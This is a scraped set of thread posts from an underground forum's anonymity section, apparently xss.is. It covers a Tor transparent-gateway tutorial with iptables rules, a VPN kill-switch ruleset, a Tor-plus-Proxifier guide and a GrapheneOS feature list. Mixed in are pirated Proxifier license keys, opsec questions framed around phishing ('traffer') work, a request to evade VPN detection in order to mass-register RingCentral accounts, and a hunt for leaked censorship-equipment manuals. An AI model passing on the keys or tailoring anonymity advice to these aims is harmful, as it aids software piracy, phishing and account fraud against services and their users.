Установили и запустили дебиан? - Отлично. Логинемся под рутом (так будет проще и быстрее, однако Вы можете проводить все манипуляции под отдельно созданным пользователем при установке, добавив его в группу судо).

Для начала обновите репы: apt update
Поставим необходимый минимум: apt install tor net-tools iptables vim -y

Внесу некоторые комментарии по поводу необходимого минимума:

tor - сервис тора. Мы поднимем прокси на локалке и будем туда отправлять трафик
net-tools - мне просто в кайф писать ifconfig вместо ip a
iptables - пакет, дающий нам возможность внести сетевые правила. Он у нас и будет заниматься редиректом трафика.
vim - текстовый редактор. По желанию само собой. Можете nano использовать, можете vi, что удобнее.

Часть 1. Сетевые интерфейсы
Время выключать виртуалку и идти редактировать её хардварную часть.
Вы должны добавить еще два сетевых интерфейса и убрать тот, что был до этого. Один сетевой интерфейс мы будем давать клиентским тачкам. Это и будет нашей изолированной сетью. Другой интерфейс для выхода во внешний мир.
Лично я проворачиваю всё на линуксе и использую связку virt-manager, qemu, kvm. Настройка сетевых интерфейсов будет проходить именно на этом сетапе, но на других сетапах всё плюс-минус тоже самое.
Для начала запустим сети и добавим в автозапуск. # на хостовой машине

Code:Copy to clipboard

sudo virsh -c qemu:///system net-autostart default
sudo virsh -c qemu"///system net-start default

В гуи вирт-менеджера Edit -> Connection details -> Virtual Networks -> нажать на плюсик.
Ввести название, для примера myroute_tor-external. Mode: NAT. Forward: любой физ девайс.
IPv4 configuration:
network: 10.0.3.0/24
dhcpv4 снять галочку

Также нам нужен сетевой интерфейс для наших клиентских тачек.
myroute_tor-internal
Mode: Isolated
Все галочки снимаем.
Вот XML для проверки:

XML:Copy to clipboard

<network>
  <name>myroute_tor-internal</name>
  <bridge name="virbr5" stp="on" delay="0"/>
  <domain name="myroute_tor-internal"/>
</network>

надо отредактировать до такого состояния.

Там где name у bridge (в xml) поставьте свой по порядку. После создания external сети, напишите ifconfig у себя на хостовой машине и найдите нужный интерфейс с нужной сетью, к нему прибавьте +1. Для удобства.

(сори, что на скрин попал кусок этой статьи, нет возможности перескринить)
Добавьте 2 нетворк интерфейса на гейтвей.

В настройках гейтвея на интерфейсе с external сетью отредактировать XML, если он у вас не совпал с моим. (на мак не обращайте внимание, он при запуске поставится)

Для интернал интерфейса аналогично.

Проверить сетевые интерфейсы можно через (на хостовой машине): sudo brctl show

Добавили сетевые интерфейсы на роутер? Отлично. Запускаем шарманку. Всё также логинемся из под рута и проверяем сетевые интерфейсы. Это можно сделать через ifconfig, либо, если вы не ставили net-tools, через ip a.
Почему-то в ifconfige у меня не отображался интерфейс. Поэтому я тоже воспользуюсь ip a .

И так, вы можете видеть свои интерфейсы. Как вы можете заметить на нашем роутере нет интернета. А еще у наших интерфейсов нет ip адресов. А всё почему? потому что нет dhcp и нет настроек под наши интерфейсы. Надо настроить интерфейсы вручную.
Запишем имена наших интерфейсов - enp1s0, enp7s0. (у вас могут быть другие)
Открываем в текстовом редакторе /etc/network/interfaces
Редактируем следующим образом:

Code:Copy to clipboard

# default
source /etc/network/interface.d/*
auto lo
iface lo inet loopback
######

# это интерфейс для коммуникаций с внешним миром. Он нам даёт интернетик
auto enp1s0 # включать при буте системы
iface enp1s0 inet static # статичная настройка сети. У нас нет dhcp
        address 10.0.3.15
        netmask 255.255.255.0
        gateway 10.0.3.1

auto enps70 # это интерфейс для нашей изолированной сети.
iface enp7s0 inet static
        address 10.152.152.10
        netmask 255.255.192.0

Вот скрин конфига сети:

Сохраняем, перезапускаем интерфейсы через systemctl restart networking

Если вы всё сделали правильно, то введя команду ip a, вы должны увидеть ipы на сетевых интерфейсах. Также должен появиться интернет.
Если нет интернета, то:

systemctl status networking (исправьте ошибку, если есть. Вероятно, могли оконфузиться в конфиге)
tcpdump на vnet*. Например, у меня virbr4 это external. Для него brctl show показывает vnet27. sudo tcpdump -i vnet27. Анализируйте пакеты, правьте ошибки. Если оконфузились в конфиге, то смотрите на ARP пакеты, вы, вероятно, ошиблись в ипе.

Подведем итог первой части. На этом моменте у вас должа быть виртуалка, две виртуальные сети, на виртуалке (роутере) должен работать интернет.
Должны быть правильно сконфигурированы интерфейсы.

Часть 2. Настройка tor
В нулевой части мы поставили тор. Теперь надо его настроить)

Добавьте в /etc/tor/torrc

Code:Copy to clipboard

VirtualAddrNetwork 10.192.0.0/10  # это не трогаем. Исходя из документации нужно ставить именно такую маску
AutomapHostsOnResolve 1
DNSPort 10.0.3.15:53530 # заменить ip если у вас другой
TransPort 10.0.3.15:9040 # заменить ip если у вас другой

Spoiler: Про VirtualAddrNetwork из доки

When providing proxy server service to a network of computers using a tool like dns-proxy-tor, change the IPv4 network to "10.192.0.0/10" or "172.16.0.0/12" and change the IPv6 network to "[FC00::]/7".

Click to expand...

Проведите дополнительную настройку, если она вам необходима. Например, уберите какие-то страны из выборки.
Если вас всё устраивает - systemctl start tor.
systemctl status tor должен показать, что всё ок.
netstat -tulpn должен показать примерно такое:

Конечно хотелось бы понять, за что отвечает каждый порт. Читайте дальше:
22 - ssh. У вас может и не быть, но мне просто удобнее через него администрировать с хостовой машины.
9050 - это дефолтный socks тора. Вы можете в него перенаправить трафик, но только socks. Он не подходит для нашей цели, потому что какое г от нас только не полетит)) Я не выключал его и он доступ только с локалки.
9040 - это transparent proxy. В него можно заливать трафик системы, но ваша система должна поддерживать прозрачные прокси. Винда и большинство дистрибутивов линукса поддерживает это.
53530 - порт для DNS. Тор будет проксировать DNS запросы. На клиенте в качестве DNS сервера указывать будем наш гейт. Т.е клиент будет отсылать запросы на 53 порт нашего гейта, а мы их будем направлять в 10.0.3.15:53530.

Часть 3. Настройка редиректа трафика
Первое, что необходимо сделать - включить редирект трафика с одного интерфейса на другой:
Добавьте эти строчки в файл /etc/sysctl.conf

Code:Copy to clipboard

net.ipv4.ip_forward = 1
net.ipv4.conf.all.rp_filter = 0
net.ipv4.conf.enp1s0.rp_filter = 0
net.ipv4.conf.enp7s0.rp_filter = 0

Сохраните файл и введите команду: sysctl -p
Должны быть выведены эти строки.

Рекомендую сейчас поставить tcpdump на гейте.
Мы скоро начнем перенаправлять пакеты. Если что-то пойдет не так, то Вы можете посмотреть трафик

Команды для iptables:

Code:Copy to clipboard

iptables -P FORWARD ACCEPT
iptables -t nat -A PREROUTING -i enp7s0 -p tcp -j DNAT --to-destination 10.0.3.15:9040
iptables -t nat -A PREROUTING -i enp7s0 -p udp --dport 53 -j DNAT --to-destination 10.0.3.15:53530

На этом этапе гейт готов принимать пакеты на enp7s0 и направлять их в тор. Также умеет перенаправлять DNS запросы в тор. Уже можно подрубать клиента, но клиента подключать будем в 5 главе.

Часть 4. Автоматизация
Хорошо, мы получили рабочий шлюз. Но при перезапуске гейта многие настройки слетают.
Что нам надо сделать?

Включить службу тора в авторан
Подтянуть настройки iptables

С первым пунктом всё ясно - systemctl enable tor.
А что делать со вторым? Есть способ сохранения настроек iptables через iptables-save и загрузки через iptables-restore.
Но лично у меня iptables-restore почему-то не хотел грузить данные. Вероятно, я делал что-то не так.
Поэтому реализуем скриптик по этому пути: /root/iptables_rules.sh
chmod +x /root/iptables_rules.sh

Bash:Copy to clipboard

#!/bin/bash
iptables -P FORWARD ACCEPT
iptables -t nat -A PREROUTING -i enp7s0 -p tcp -j DNAT --to-destination 10.0.3.15:9040
iptables -t nat -A PREROUTING -i enp7s0 -p udp --dport 53 -j DNAT --to-destination 10.0.3.15:53530

И создадим сервис для systemd.
Заходим в /etc/systemd/system
Создаем сервис iptables_rules.service с таким содержимым:

Code:Copy to clipboard

[Unit]
Description=Autorun iptables

[Service]
ExecStart=/root/iptables_rules.sh

[Install]
WantedBy=multi-user.target

Запускаем и добавляем сервис в авторан:

Bash:Copy to clipboard

systemctl start iptables_rules
systemctl enable iptables_rules

Ребутаем тачку и проверяем iptables -t nat -S
Видим наши правила. Всё пашет, как надо.

Часть 5. Как подрубиться к шлюзу с клиента
В вирт-манагере добавляем сетевой интерфейс к машине. Сетевой интерфейс с isolated network. Т.е наш myroute_tor-internal. Запускаемся.
Надеюсь, что в качестве клиентской ОС вы используете что-то с гуи. Если без, то инструкции не будет
Я покажу на примере Debian 12 с XFCE.
Логинемся в юзверя, ищем программку Advanced Network Configuration. Она вроде как по умолчанию с крысой ставится.
Заходим в настройки нашего wired connection.
Там заходим в IPv4 Settings и делаем такие же настройки, как на картинке.
Не забудьте поставить в /etc/resolv.conf наш гейт в качестве DNS сервера.
Содержимое /etc/resolv.conf:

Code:Copy to clipboard

nameserver 10.152.152.10

Для другие десктоп энвайрментов примерно также. Для винды тоже +- также. (если не получается сообразить, то поищите видосы на ютубе, о том как соединить хуникс и винду/кали. Процесс 1 в 1)
Если вы всё-таки используете клиентский линукс без гуи, то настройте руками через /etc/network/interfaces в соответствии с картинкой выше.

Часть 6. Заключение
Мы только что сделали аналог гейтвея whonix. Свой.
В целом это не очень сложный процесс был.
В догонку через iptables можете порезать весь трафик, который идет не в тор с самого гейта. Но я не особо много вижу в этом смысла, потому что тогда становится невозможным обновление ПО на самом гейте. (либо возможно, но через тор, что не очень быстро)
По большей степени статья адресована новичкам, которые не совсем догоняют, как устроен хуникс.
Просьба написать в тред, если Вы видите ошибке в моей статье.
Вместо тора кстати можно использовать любой другой транспарент прокси.
Удачи и до новых встречь.

Всем спасибо за внимание.
Специально для XSS.IS
От D3buG

Mullvad, обсуждение

ID: 676533bbb4103b69df3718f7
Thread ID: 85157
Created: 2023-04-03T19:30:09+0000
Last Post: 2024-11-28T17:32:29+0000
Author: S3VE7N
Replies: 56 Views: 4K

![mullvad.net](/proxy.php?image=https%3A%2F%2Fmullvad.net%2Fimages%2Fbrowser- og.jpg&hash=06459bdd4b8c9efda8f5713712b12869&return_error=1)

[ Free the internet. With the Mullvad Browser.

](https://mullvad.net/browser)

The Mullvad Browser is a privacy-focused web browser developed in collaboration between Mullvad VPN and the Tor Project. It’s produced to minimize tracking and fingerprinting.

mullvad.net

![mullvad.net](/proxy.php?image=https%3A%2F%2Fmullvad.net%2Fimages%2Fbrowser- og.jpg&hash=06459bdd4b8c9efda8f5713712b12869&return_error=1)

[ The Mullvad Browser hard facts: list of settings and modifications

](https://mullvad.net/en/browser/hard-facts)

Want to know exactly how the Mullvad Browser combat fingerprinting and other tracking? This is the place.

![mullvad.net](/proxy.php?image=https%3A%2F%2Fmullvad.net%2Fen%2Fbrowser%2Fhard- facts%2F..%2F..%2Ffavicon.svg&hash=ec0411cf31ac5f88b5a9ad25f15342c0&return_error=1) mullvad.net

Правильное использование VPN в Linux

ID: 676533bbb4103b69df371905
Thread ID: 58648
Created: 2021-11-08T17:23:51+0000
Last Post: 2024-11-19T22:18:49+0000
Author: BuyKall
Prefix: Мануал/Книга
Replies: 35 Views: 4K

При работе через VPN, все хотят скрыть свой реальный ip адрес. Но не у всех получается.

И тут подойдёт цитата одного знаменитого человека: «А сегодня в завтрашний день не все могут смотреть. Вернее смотреть могут не только лишь все, мало кто может это делать»

Сегодня искореним этот пробел, чтобы новички не задавали одни и те же вопросы и могли двигаться дальше.

Bash:Copy to clipboard

sudo apt install iptables-persistent
sudo nano /etc/iptables/rules.v4

Туда добавляем

Bash:Copy to clipboard

*filter
:INPUT DROP [0:0]
:FORWARD DROP [0:0]
:OUTPUT DROP [0:0]
-A INPUT -i lo -j ACCEPT
-A OUTPUT -o lo -j ACCEPT
-A INPUT -s x.x.x.x -m state --state RELATED,ESTABLISHED -j ACCEPT
-A OUTPUT -d x.x.x.x -p tcp --dport 443 -j ACCEPT
-A INPUT -i tun0 -j ACCEPT
-A OUTPUT -o tun0 -j ACCEPT
COMMIT

Пояснение:
x.x.x.x - это IP адрес VPN/OpenVPN сервера к которому вы будете подключаться.
tcp - это протокол, который используется при подключении к VPN, если будет использоваться udp, то надо заменить tcp на udp.
443 - это порт, к которому происходит подключении. Если используется отличный от 443, то надо его заменить на актуальный.
tun0 - название вашего интерфейса, который появляется при создании VPN- тоннеля. Если используется отличный от tun0, то надо его заменить на актуальный(ifconfig после подключения к VPN и смотрите какой интерфейс у вас добавился).

sudo iptables-restore < /etc/iptables/rules.v4

Вот и всё, а вы чего хотели?

xss.is BuyKall

Локально или на дедике что безопаснее?

ID: 676533bbb4103b69df371923
Thread ID: 107548
Created: 2024-02-05T15:51:27+0000
Last Post: 2024-10-03T06:56:10+0000
Author: schizoidxD
Replies: 50 Views: 4K

Если поговорить о безопасность на чём будет анонимнее и безопаснее работать на дедике или локальной машине? Если на дедике то почему и если на локально то почему? Если к примеру ты траффер или включён в другой фишинговой роль.

Use tor the right way.

ID: 676533bbb4103b69df371932
Thread ID: 116698
Created: 2024-06-12T19:52:27+0000
Last Post: 2024-09-10T15:52:15+0000
Author: Guest
Replies: 24 Views: 4K

Hello, I will explain how to use the Tor network to remain anonymous. All you need is a reliable VPN. If possible, I recommend establishing your own [OpenVPN configuration](https://www.digitalocean.com/community/tutorials/how- to-set-up-and-configure-an-openvpn-server-on-ubuntu-20-04) on your server otherwise, Mullvad would suffice. First, download and install the Tor Browser. Once installed, browse to Tor Browser\Browser\TorBrowser\Data\Tor\ and add the following line below to the torrc file.

ExcludeExitNodes {us},{gb},{ca},{au},{nz},{be},{dk},{fr},{de},{it},{nl},{no},{es},{se},{au},{in},{il},{tw},{??},{al},{tr},{cz},{gr},{hu},{is},{lv},{lt},{lu},{pl},{pt},{ro},{sk},{si},{bg},{hr},{ee},{mk},{me},{rs},{ba},{gl},{md},{uk},{cy},{mt},{ge}

Adding that line to the torrc file instructs Tor to exclude all exit nodes belonging to NATO nations. Now we must select our [bridge](https://tb- manual.torproject.org/bridges/). Open Tor and navigate to about:preferences#connection, then select a Built-In Bridge, which is the obfs4 bridge. Now we are ready to connect to Tor.

Now we will download software called Proxifier, which will allow us to route our entire computer over the Tor network. Download and install Proxifier the license key's will be provided down below.

Portable Edition: L6Z8A-XY2J4-BTZ3P-ZZ7DF-A2Q9C
Standard Edition: 5EZ8G-C3WL5-B56YG-SCXM9-6QZAP
OSX Hosts: P427L-9Y552-5433E-8DSR3-58Z68

After adding the license key, go to Proxy Servers. Set the IP address to 127.0.0.1, port number to 9150, and protocol to SOCKS Version 5. After that, click Okay and then browse to rules, where you can add our new rule by clicking Add.. You can change the name to Tor, and the action must be set to your Tor proxy.

In order to prevent undesirable Microsoft processes from connecting to Tor with us, we will now create a new rule. We'll return to Rules > Add.. and change the name to Block there. We'll copy and paste the following line into the Applications text field and set the action to block.

svchost.exe; smartscreen.exe; searchhost.exe; widgets.exe; systemsettings.exe; cmd.exe; msedgewebview2.exe; wefault.exe

That is only a common list of Microsoft processes that likes to connect with us there are many more, so make sure to stop them as you see them. Now, this approach will greatly slow down everything you do, but it is best practice. You can now connect to your RDP and get to work.

Happy hunting

Курс "За тобой не придут с болгаркой"

ID: 676533bbb4103b69df37193c
Thread ID: 116249
Created: 2024-06-06T13:28:31+0000
Last Post: 2024-08-20T18:05:54+0000
Author: Exlips
Replies: 26 Views: 4K

У кого-нибудь есть слив данного курса("За тобой не придут с болгаркой")? Один человек писал, что он тут находил слив этого курса.

Скрыть или замаскировать использование VPN или прокси

ID: 676533bbb4103b69df37194e
Thread ID: 111909
Created: 2024-04-03T16:09:44+0000
Last Post: 2024-06-27T17:11:44+0000
Author: Mandibula
Replies: 51 Views: 4K

Привет всем, мне нужна ваша помощь. Итак, я хочу зарегистрировать аккаунт на RingCentral.com. Но я не могу, потому что этот сайт обнаруживает, что я использую VPN и прокси. Да, это правда, я использую ExpressVPN и прокси в Octobrowser IPv4. Поэтому я прошу вас помочь мне, как замаскировать все это, чтобы я мог создать 10 аккаунтов на RingCentral.com. Заранее большое спасибо.

документация на ТСПУ

ID: 676533bbb4103b69df3719c4
Thread ID: 99735
Created: 2023-10-09T16:43:06+0000
Last Post: 2024-01-15T22:18:10+0000
Author: gliderexpert
Replies: 62 Views: 4K

Всем привет! Кто-нибудь уже находил слитые/утёкшие мануалы по ящикам ТСПУ которые ставятся провайдерами в ру?
Либо какие-нибудь ТЗ на их разработку, приемку, что-то подобное.
Разыскиваю информацию по каким принципам они детектируют обфусцированный трафик.

Простой пример - поднимаю туннель shadowsocks, внутри него запускаю TOR, все работает до тех пор пока не начинается активное использование TORа. Как только начинаю гнать траф через тор, причем преимущественно аплинки - shadowsocks падает по таймаутам, какая-то неведомая хрень блочит пакеты, и подозреваю я что это ТСПУ т.к. проблема возникла относительно недавно. Если просто гнать "обычный" траф через shadowsocks, типа порнохаб репостить в фейсбук и все такое - тоннель не отваливается. Проблемы именно с тором внутри тоннеля. Не на всех провайдерах, поэтому дело точно не в конфигах системы.

Знакомые инженеры, работающие у провайдеров не смогли пролить свет на данный вопрос, похоже что не сильно далеко их в конфиги этих ТСПУ- ящиков пускают.

В общем ищу любую информацию из открытых источников. Чем вы эти источники открываете, спрашивать не буду ))

Анонимность, безопасность Android

ID: 676533bbb4103b69df3719de
Thread ID: 57695
Created: 2021-10-13T22:11:31+0000
Last Post: 2023-11-22T15:09:35+0000
Author: snk420
Replies: 75 Views: 4K

Шалом уважаемая публика. Хотел бы задать вопрос насущный. Все мы знаем про связки на ПК впн+тор+впн аля пролив всея трафика виртуалки через whonix и достижения приличного уровня конфиденциальности, так вот идея заключается не в самом заворачивании трафика, а невозможность выпасть реальному ip через прокладку вхоникса. Так вот вопрос, есть ли способы достижения такой анонимности на анроид? Кто какие ос юзает и почему? Заранее благодарю за отклик.

Анонимность, безопасность мобильных OS (LineageOS, GrapheneOS)

ID: 676533bbb4103b69df371a51
Thread ID: 56943
Created: 2021-09-22T00:57:26+0000
Last Post: 2023-06-13T07:57:15+0000
Author: build_ext
Replies: 40 Views: 4K

As we all know, Google just loves to suck up all of our data to sell to advertisers (which is bad enough), however, they also let every 3 letter Government agency also have access to that data plus more! I used to use phhusson's version of AOSP (Android Open Source Project) which is completely stripped down to bare Android without any proprietary software and without Android talking back to Google HQ every 2 minutes. It was (and still is) great. i won't go too deeply into it here but I highly recommend using it as a starting point if you love open source software and GSI's.

Quick note, here is a great GSI list if anybody is interested: <https://github.com/phhusson/treble_experimentations/wiki/Generic-System- Image-(GSI)-list>

There used to be a ROM called CopperheadOS, they had a great lead dev named Daniel, well he left the team due to a falling out and due to him being the God he is and the reason the project functioned as well as it did the project completely died. Daniel then started another project called GrapheneOS which is the best Android distribution out there if you are looking for Privacy and Security. Here is a list of features in the spoiler:

Spoiler

Hardened app runtime
Stronger app sandbox
Hardened libc providing defenses against the most common classes of vulnerabilities (memory corruption)
Our own hardened malloc (memory allocator) leveraging modern hardware capabilities to provide substantial defenses against the most common classes of vulnerabilities (heap memory corruption) along with reducing the lifetime of sensitive data in memory. The hardened_malloc README has extensive documentation on it. The hardened_malloc project is portable to other Linux-based operating systems and is being adopted by other security-focused operating systems like Whonix. Our allocator also heavily influenced the design of the next-generation musl malloc implementation which offers substantially better security than musl's previous malloc while still having minimal memory usage and code size.
- Fully out-of-line metadata with protection from corruption, ruling out traditional allocator exploitation
- Separate memory regions for metadata, large allocations and each slab allocation size class with high entropy random bases and no address space reuse between the different regions
- Deterministic detection of any invalid free
- Zero-on-free with detection of write-after-free via checking that memory is still zeroed before handing it out again
- Delayed reuse of address space and memory allocations through the combination of deterministic and randomized quarantines to mitigate use-after-free vulnerabilities
- Fine-grained randomization
- Aggressive consistency checks
- Memory protected guard regions around allocations larger than 16k with randomization of guard region sizes for 128k and above
- Allocations smaller than 16k have guard regions around each of the slabs containing allocations (for example, 16 byte allocations are in 4096 byte slabs with 4096 byte guard regions before and after)
- Random canaries with a leading zero are added to these smaller allocations to block C string overflows, absorb small overflows and detect linear overflows or other heap corruption when the canary value is checked (primarily on free)
Hardened compiler toolchain
Hardened kernel
- Support for dynamically loaded kernel modules is disabled and the minimal set of modules for the device model are built into the kernel to substantially improve the granularity of Control Flow Integrity (CFI) and reduce attack surface.
- 4-level page tables are enabled on arm64 to provide a much larger address space (48-bit instead of 39-bit) with significantly higher entropy Address Space Layout Randomization (33-bit instead of 24-bit).
- Random canaries with a leading zero are added to the kernel heap (slub) to block C string overflows, absorb small overflows and detect linear overflows or other heap corruption when the canary value is checked (on free, copies to/from userspace, etc.).
- Memory is wiped (zeroed) as soon as it's released in both the low-level kernel page allocator and higher level kernel heap allocator (slub). This substantially reduces the lifetime of sensitive data in memory, mitigates use-after-free vulnerabilities and makes most uninitialized data usage vulnerabilities harmless. Without our changes, memory that's released retains data indefinitely until the memory is handed out for other uses and gets partially or fully overwritten by new data.
- Kernel stack allocations are zeroed to make most uninitialized data usage vulnerabilities harmless.
- Assorted attack surface reduction through disabling features or setting up infrastructure to dynamically enable/disable them only as needed (perf, ptrace).
- Assorted upstream hardening features are enabled, including many which we played a part in developing and landing upstream as part of our linux-hardened project (which we intend to revive as a more active project again).
Prevention of dynamic native code execution in-memory or via the filesystem for the base OS without going via the package manager, etc.
Filesystem access hardening
Enhanced verified boot with better security properties and reduced attack surface
Enhanced hardware-based attestation with more precise version information
Eliminates remaining holes for apps to access hardware-based identifiers
Greatly reduced remote, local and proximity-based attack surface by stripping out unnecessary code, making more features optional and disabling optional features by default (NFC, Bluetooth, etc.), when the screen is locked (connecting new USB peripherals, camera access) and optionally after a timeout (Bluetooth, Wi-Fi)
Option to disable native debugging (ptrace) to reduce local attack surface (still enabled by default for compatibility)
Low-level improvements to the filesystem-based full disk encryption used on modern Android
Support for logging out of user profiles without needing a device manager: makes them inactive so that they can't continue running code while using another profile and purges the disk encryption keys (which are per-profile) from memory and hardware registers
Option to enable automatically rebooting the device when no profile has been unlocked for the configured time period to put the device fully at rest again.
Indicators for active camera and microphone usage are enabled by default alongside the traditional location indicator
Improved user visibility into persistent firmware security through version and configuration verification with reporting of inconsistencies and debug features being enabled.
Support longer passwords by default (64 characters) without a device manager
Stricter implementation of the optional fingerprint unlock feature permitting only 5 attempts rather than 20 before permanent lockout (our recommendation is still keeping sensitive data in user profiles without fingerprint unlock)
PIN scrambling option
LTE-only mode to reduce cellular radio attack surface by disabling enormous amounts of legacy code
Per-connection MAC randomization option (enabled by default) as a more private option than the standard persistent per-network random MAC.
When the per-connection MAC randomization added by GrapheneOS is being used, DHCP client state is flushed before reconnecting to a network to avoid revealing that it's likely the same device as before.
Improved IPv6 privacy addresses to prevent tracking across networks
Vanadium: hardened WebView and default browser — the WebView is what most other apps use to handle web content, so you benefit from Vanadium in many apps even if you choose another browser
Hardware-based security verification and monitoring: the Auditor app app and attestation service provide strong hardware-based verification of the authenticity and integrity of the firmware/software on the device. A strong pairing-based approach is used which also provides verification of the device's identity based on the hardware backed key generated for each pairing. Software-based checks are layered on top with trust securely chained from the hardware. For more details, see the about page and tutorial.
PDF Viewer: sandboxed, hardened PDF viewer using HiDPI rendering with pinch to zoom, text selection, etc.
Encrypted backups via integration of the Seedvault app with support for local backups and any cloud storage provider with a storage provider app
Secure application spawning system avoiding sharing address space layout and other secrets across applications
Network permission toggle for disallowing both direct and indirect access to any of the available networks. The device-local network (localhost) is also guarded by this permission, which is important for preventing apps from using it to communicate between profiles. Unlike a firewall-based implementation, the Network permission toggle prevents apps from using the network via APIs provided by the OS or other apps in the same profile as long as they're marked appropriately.
The standard INTERNET permission used as the basis for the Network permission toggle is enhanced with a second layer of enforcement and proper support for granting/revoking it on a per-profile basis.
Sensors permission toggle: disallow access to all other sensors not covered by existing Android permissions (Camera, Microphone, Body Sensors, Activity Recognition) including an accelerometer, gyroscope, compass, barometer, thermometer and any other sensors present on a given device. To avoid breaking compatibility with Android apps, the added permission is enabled by default.
Authenticated encryption for network time updates via a first party server to prevent attackers from changing the time and enabling attacks based on bypassing certificate / key expiry, etc.
Proper support for disabling network time updates rather than just not using the results
Connectivity checks via a first party server with the option to revert to the standard checks (to blend in) or to fully disable them
Hardened local build / signing infrastructure
Seamless automatic OS update system that just works and stays out of the way in the background without disrupting device usage, with full support for the standard automatic rollback if the first boot of the updated OS fails
Require unlocking to access sensitive functionality via quick tiles
Minor changes to default settings to prefer privacy over small conveniences: personalized keyboard suggestions based on gathering input history are disabled by default, sensitive notifications are hidden on the lockscreen by default and passwords are hidden during entry by default
Minimal bundled apps and services. Only essential apps are integrated into the OS. We don't make partnerships with apps and services to bundle them into the OS. An app may be the best choice today and poor choice in the future. Our approach will be recommending certain apps during the initial setup, not hard-wiring them into the OS.
No Google apps and services. These can be used on GrapheneOS but only if they avoid requiring invasive OS integration. Building privileged support for Google services into the OS isn't something we're going to be doing, even if that's partially open source like microG.
Compatibility layer for coercing user installed Google Play services into running as sandboxed apps without any special privileges.
Fixes for multiple serious vulnerabilities not yet fixed upstream due to a flexible release cycle / process prioritizing security.

Services

Service infrastructure features:

Strict privacy and security practices for our infrastructure
Unnecessary logging is avoided and logs are automatically purged after 10 days
Services are hosted entirely via our own dedicated servers and virtual machines from OVH without involving any additional parties for CDNs, SaaS platforms, mirrors or other services
Our services are built with open technology stacks to avoid being locked in to any particular hosting provider or vendor
Open documentation on our infrastructure including listing out all of our services, guides on making similar setups, published configurations for each of our web services, etc.
No proprietary services
Authenticated encryption for all of our services
Strong cipher configurations for all of our services (SSH, TLS, etc.) with only modern AEAD ciphers providing forward secrecy
Our web sites do not include any third party content and entirely forbid it via strict Content Security Policy rules
Our web sites disable referrer headers to maximize privacy
Our web sites fully enable cross origin isolation and disable embedding in other content
DNSSEC implemented for all of our domains to provide a root of trust for encryption and authentication for domain/server configuration
DNS Certification Authority Authorization (CAA) records for all of our domains permitting only Let's Encrypt to issue certificates with fully integrated support for the experimental accounturi and validationmethods pinning our Let's Encrypt accounts as the only ones allowed to issue certificates
DANE TLSA records for pinning keys for all our TLS services
Our mail server enforces DNSSEC/DANE to provide authenticated encryption when sending mail including alert messages from the attestation service
SSHFP across all domains for pinning SSH keys
Static key pinning for our services in apps like Auditor
Our web services use robust OCSP stapling with Must-Staple
No persistent cookies or similar client-side state for anything other than login sessions, which are set up via SameSite=strict cookies and have server-side session tracking with the ability to log out of other sessions
scrypt-based password hashing (likely Argon2 when the available implementations are more mature)

This distribution can only be installed on Pixel phones due to the use of specific security chips that only come in the Pixel lineup.

----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

Как мы все знаем, Google просто любит поглощать все наши данные, чтобы продавать их рекламодателям (что достаточно плохо), однако они также позволяют каждому правительственному агентству из 3 букв также иметь доступ к этим данным и многое другое! Раньше я использовал версию AOSP от phhusson (проект с открытым исходным кодом для Android), которая полностью разделась до голого Android без какого-либо проприетарного программного обеспечения и без того, чтобы Android каждые 2 минуты перезванивал в штаб-квартиру Google. Это было (и до сих пор остается) здорово. я не буду углубляться в это здесь, но я настоятельно рекомендую использовать его в качестве отправной точки, если вы любите программное обеспечение с открытым исходным кодом и GSI.

Краткое примечание, вот отличный список GSI, если кому - то интересно: <https://github.com/phhusson/treble_experimentations/wiki/Generic-System- Image-(GSI)-список>

Раньше был ПЗУ под названием CopperheadOS, у них был отличный ведущий разработчик по имени Дэниел, ну, он покинул команду из-за ссоры и из-за того, что он был Богом, которым он является, и причина, по которой проект функционировал так же хорошо, как и проект, полностью умер. Затем Дэниел запустил еще один проект под названием GrapheneOS, который является лучшим дистрибутивом Android, если вы ищете конфиденциальность и безопасность. Вот список функций в спойлере:

Spoiler

Усиленная среда выполнения приложения
Более сильная песочница приложений
Защищенный libc, обеспечивающий защиту от наиболее распространенных классов уязвимостей (повреждение памяти)
Наш собственный защищенный malloc (распределитель памяти) использует современные аппаратные возможности для обеспечения существенной защиты от наиболее распространенных классов уязвимостей (повреждение памяти кучи) наряду с сокращением срока службы конфиденциальных данных в памяти. В файле README hardened_malloc имеется обширная документация по нему. Проект hardened_malloc переносим на другие операционные системы на базе Linux и внедряется другими операционными системами, ориентированными на безопасность, такими как Whonix. Наш распределитель также сильно повлиял на разработку реализации musl malloc следующего поколения, которая обеспечивает значительно лучшую безопасность, чем предыдущая malloc musl, при этом сохраняя минимальное использование памяти и размер кода.
Полностью автономные метаданные с защитой от коррупции, исключающие использование традиционных распределителей
Отдельные области памяти для метаданных, больших выделений и каждого класса размера распределения блоков с высокой энтропией случайных баз и отсутствием повторного использования адресного пространства между различными регионами
Детерминированное обнаружение любых недействительных бесплатных
Без нуля с обнаружением записи после освобождения путем проверки того, что память все еще обнулена, прежде чем выдавать ее снова
Отложенное повторное использование адресного пространства и выделений памяти за счет сочетания детерминированных и рандомизированных карантинов для устранения уязвимостей, связанных с использованием после освобождения
Мелкозернистая рандомизация
Агрессивные проверки согласованности
Защищенные области защиты памяти вокруг выделений размером более 16 Кб с рандомизацией размеров областей защиты для 128 Кб и выше
Распределения размером менее 16 кб имеют защитные области вокруг каждой из плит, содержащих распределения (например, 16-байтовые распределения находятся в 4096-байтовых плитах с 4096-байтовыми защитными областями до и после)
Случайные канарейки с начальным нулем добавляются к этим меньшим распределениям, чтобы блокировать переполнение строки C, поглощать небольшие переполнения и обнаруживать линейные переполнения или другое повреждение кучи при проверке значения канарейки (в основном на free)
Закаленная цепочка инструментов компилятора
Закаленное ядро
Поддержка динамически загружаемых модулей ядра отключена, и минимальный набор модулей для модели устройства встроен в ядро, чтобы существенно улучшить детализацию целостности потока управления (CFI) и уменьшить поверхность атаки.
4-уровневые таблицы страниц включены в arm64, чтобы обеспечить гораздо большее адресное пространство (48 бит вместо 39 бит) со значительно более высокой рандомизацией расположения адресного пространства по энтропии (33 бит вместо 24 бит).
Случайные канарейки с начальным нулем добавляются в кучу ядра (slub), чтобы блокировать переполнение строки C, поглощать небольшие переполнения и обнаруживать линейные переполнения или другие повреждения кучи при проверке значения канарейки (на свободном, копируется в/из пространства пользователя и т. Д.).
